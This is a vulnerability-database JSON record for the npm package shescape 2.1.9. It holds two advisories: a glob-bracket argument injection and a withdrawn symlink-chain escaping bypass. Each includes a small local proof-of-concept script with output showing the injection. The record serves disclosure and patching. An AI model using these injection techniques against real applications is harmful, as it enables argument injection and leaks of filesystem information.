{"url":"http://public2.vulnerablecode.io/api/packages/57321?format=json","purl":"pkg:npm/shescape@2.1.9","type":"npm","namespace":"","name":"shescape","version":"2.1.9","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"2.1.10","latest_non_vulnerable_version":"2.1.10","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21078?format=json","vulnerability_id":"VCID-e6b1-cdxb-eqhk","summary":"Shescape escape() leaves bracket glob expansion active on Bash, BusyBox, and Dash\n### Summary\n\n`Shescape#escape()` does not escape square-bracket glob syntax for Bash, BusyBox `sh`, and Dash. Applications that interpolate the return value directly into a shell command string can cause an attacker-controlled value like `secret[12]` to expand into multiple filesystem matches instead of a single literal argument, turning one argument into multiple trusted-pathname matches.\n\n### Details\n\nThe unquoted Unix escape helpers never add `[` or `]` to their “special characters” regexes:\n\n- `src/internal/unix/bash.js:14-30`\n- `src/internal/unix/busybox.js:14-30`\n- `src/internal/unix/dash.js:12-19`\n\nThey escape `*`/`?` but not brackets, so `new Shescape({ shell: \"/usr/bin/bash\" }).escape(\"secret[12]\")` still produces `secret[12]`. The fixtures (`test/fixtures/unix.js:2236-2265`, `3496-3525`, `5762-5792`) are currently written to expect literal brackets for these shells, confirming the behavior. The documentation recommends `Shescape#escape()` as the fallback for `exec` when quoting isn’t possible (`docs/recipes.md:154-183`).\n\n### Proof of Concept\n\nUse the published npm tarball without modifications:\n\n```shell\ntmp=$(mktemp -d)\ncd \"$tmp\"\nnpm pack shescape@2.1.9 >/dev/null\nmkdir pkg\ntar -xzf shescape-2.1.9.tgz -C pkg\ncd pkg/package\nnpm install --omit=dev\n\nnode --input-type=module - <<'NODE'\nimport { mkdtempSync, writeFileSync } from \"node:fs\";\nimport { tmpdir } from \"node:os\";\nimport path from \"node:path\";\nimport { execSync } from \"node:child_process\";\nimport { Shescape } from \"./src/index.js\";\n\nconst dir = mkdtempSync(path.join(tmpdir(), \"shescape-ghsa-poc-\"));\nwriteFileSync(path.join(dir, \"secret1\"), \"\");\nwriteFileSync(path.join(dir, \"secret2\"), \"\");\n\nfor (const shell of [\"/usr/bin/bash\", \"/usr/bin/dash\"]) {\n  const shescape = new Shescape({ shell });\n  const escaped = shescape.escape(\"secret[12]\");\n  console.log(${shell} escaped=${escaped});\n  const out = execSync(printf '<%s>\\\\n' ${escaped}, { cwd: dir, shell }).toString();\n  process.stdout.write(out);\n}\nNODE\n```\n\nOutput:\n\n```text\n/usr/bin/bash escaped=secret[12]\n<secret1>\n<secret2>\n/usr/bin/dash escaped=secret[12]\n<secret1>\n<secret2>\n```\n\nExpected: the shell receives `secret\\[12\\]`, so only one literal argument runs.\n\n### Impact\n\nArgument injection: a single untrusted argument expands into multiple pathname matches from the trusted filesystem. This can change command behavior, target unintended files, or leak filenames. Any application calling `Shescape#escape()` with Bash/BusyBox/Dash shells and interpolating the result into a shell command string is affected.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32094","reference_id":"","reference_type":"","scores":[{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17677","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32094"},{"reference_url":"https://github.com/ericcornelissen/shescape","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ericcornelissen/shescape"},{"reference_url":"https://github.com/ericcornelissen/shescape/commit/6add105c6f6b508662bb5ae3b3bdd4c9bcebf37a","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-12T19:54:11Z/"}],"url":"https://github.com/ericcornelissen/shescape/commit/6add105c6f6b508662bb5ae3b3bdd4c9bcebf37a"},{"reference_url":"https://github.com/ericcornelissen/shescape/pull/2410","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ericcornelissen/shescape/pull/2410"},{"reference_url":"https://github.com/ericcornelissen/shescape/releases/tag/v2.1.10","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ericcornelissen/shescape/releases/tag/v2.1.10"},{"reference_url":"https://github.com/ericcornelissen/shescape/security/advisories/GHSA-9jfh-9xrq-4vwm","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-12T19:54:11Z/"}],"url":"https://github.com/ericcornelissen/shescape/security/advisories/GHSA-9jfh-9xrq-4vwm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32094","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32094"},{"reference_url":"https://github.com/advisories/GHSA-9jfh-9xrq-4vwm","reference_id":"GHSA-9jfh-9xrq-4vwm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9jfh-9xrq-4vwm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56134?format=json","purl":"pkg:npm/shescape@2.1.10","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/shescape@2.1.10"}],"aliases":["CVE-2026-32094","GHSA-9jfh-9xrq-4vwm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-e6b1-cdxb-eqhk"}],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21922?format=json","vulnerability_id":"VCID-2shw-a75s-dkg6","summary":"Withdrawn Advisory: Shescape has possible misidentification of shell due to link chains\n## Withdrawn Advisory\n\nThis advisory has been withdrawn because it falls outside the https://github.com/ericcornelissen/shescape/blob/a2544a1c78cae19d0e81a485b997bf0b0fcc2c12/SECURITY.md#threat-model. This link is maintained to preserve external references.\n\n## Original Description\n### Impact\n\nThis impacts users of Shescape that configure their `shell` to point to a file on disk that is a link to a link. The precise result of being affected depends on the actual shell used and incorrect shell identified by Shescape.\n\nIn particular, an attacker may be able to bypass escaping for the shell being used. This can result, for example, in exposure of sensitive information, consider the following proof of concept (targeting Shescape v2):\n\n```javascript\nimport fs from \"node:fs\";\nimport { exec } from \"node:child_process\";\n\nimport { Shescape } from \"shescape\";\nimport which from \"which\";\n\n/* 1. Set up */\nconst shell = which.sync(\"bash\");\nconst linkToShell = \"./csh\";\nconst linkToLink = \"./link\";\n\nfs.rmSync(linkToLink, { force: true });\nfs.rmSync(linkToShell, { force: true });\nfs.symlinkSync(shell, linkToShell);\nfs.symlinkSync(linkToShell, linkToLink);\n\n/* 2. Misconfiguration */\nconst execOptions = {\n  shell: linkToLink,\n};\n\nconst shescape = new Shescape({\n  shell: execOptions.shell,\n});\n\n/* 3. Payload */\nconst userInput = \"a=:~\";\n\n/* 4. Attack example */\nexec(\n  `echo Hello ${shescape.escape(userInput)}`,\n  { shell: execOptions.shell },\n  (error, stdout) => {\n    fs.rmSync(linkToLink);\n    fs.rmSync(linkToShell);\n\n    if (error) {\n      console.error(`An error occurred: ${error}`);\n    } else {\n      console.log(stdout);\n      // Output:  \"Hello a=:/home/user\"\n    }\n  },\n);\n```\n\n### Patches\n\nThis problem has been patched in [v2.1.9](https://www.npmjs.com/package/shescape/v/2.1.9) which you can upgrade to now.\n\n### Workarounds\n\nIf upgrading is not an option, either avoid using a shell or make sure the shell path you use is not a link to a link.\n\n### References\n\n- Shescape Pull Request [#2388](https://github.com/ericcornelissen/shescape/pull/2388)\n- Shescape Release [v2.1.9](https://github.com/ericcornelissen/shescape/releases/tag/v2.1.9)\n\n### For more information\n\n- Comment on Pull Request [#2388](https://github.com/ericcornelissen/shescape/pull/2388)\n- Open an issue at <https://github.com/ericcornelissen/shescape/issues> (New issue > Question)","references":[{"reference_url":"https://github.com/ericcornelissen/shescape","reference_id":"","reference_type":"","scores":[{"value":"2.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ericcornelissen/shescape"},{"reference_url":"https://github.com/ericcornelissen/shescape/pull/2388","reference_id":"","reference_type":"","scores":[{"value":"2.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ericcornelissen/shescape/pull/2388"},{"reference_url":"https://github.com/ericcornelissen/shescape/releases/tag/v2.1.9","reference_id":"","reference_type":"","scores":[{"value":"2.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ericcornelissen/shescape/releases/tag/v2.1.9"},{"reference_url":"https://github.com/ericcornelissen/shescape/security/advisories/GHSA-6f6w-6j58-rq76","reference_id":"","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ericcornelissen/shescape/security/advisories/GHSA-6f6w-6j58-rq76"},{"reference_url":"https://github.com/github/advisory-database/pull/7206","reference_id":"","reference_type":"","scores":[{"value":"2.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/github/advisory-database/pull/7206"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30916","reference_id":"","reference_type":"","scores":[{"value":"2.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30916"},{"reference_url":"https://www.npmjs.com/package/shescape/v/2.1.9","reference_id":"","reference_type":"","scores":[{"value":"2.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.npmjs.com/package/shescape/v/2.1.9"},{"reference_url":"https://github.com/advisories/GHSA-6f6w-6j58-rq76","reference_id":"GHSA-6f6w-6j58-rq76","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6f6w-6j58-rq76"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/57321?format=json","purl":"pkg:npm/shescape@2.1.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-e6b1-cdxb-eqhk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/shescape@2.1.9"}],"aliases":["CVE-2026-30916","GHSA-6f6w-6j58-rq76"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2shw-a75s-dkg6"}],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/shescape@2.1.9"}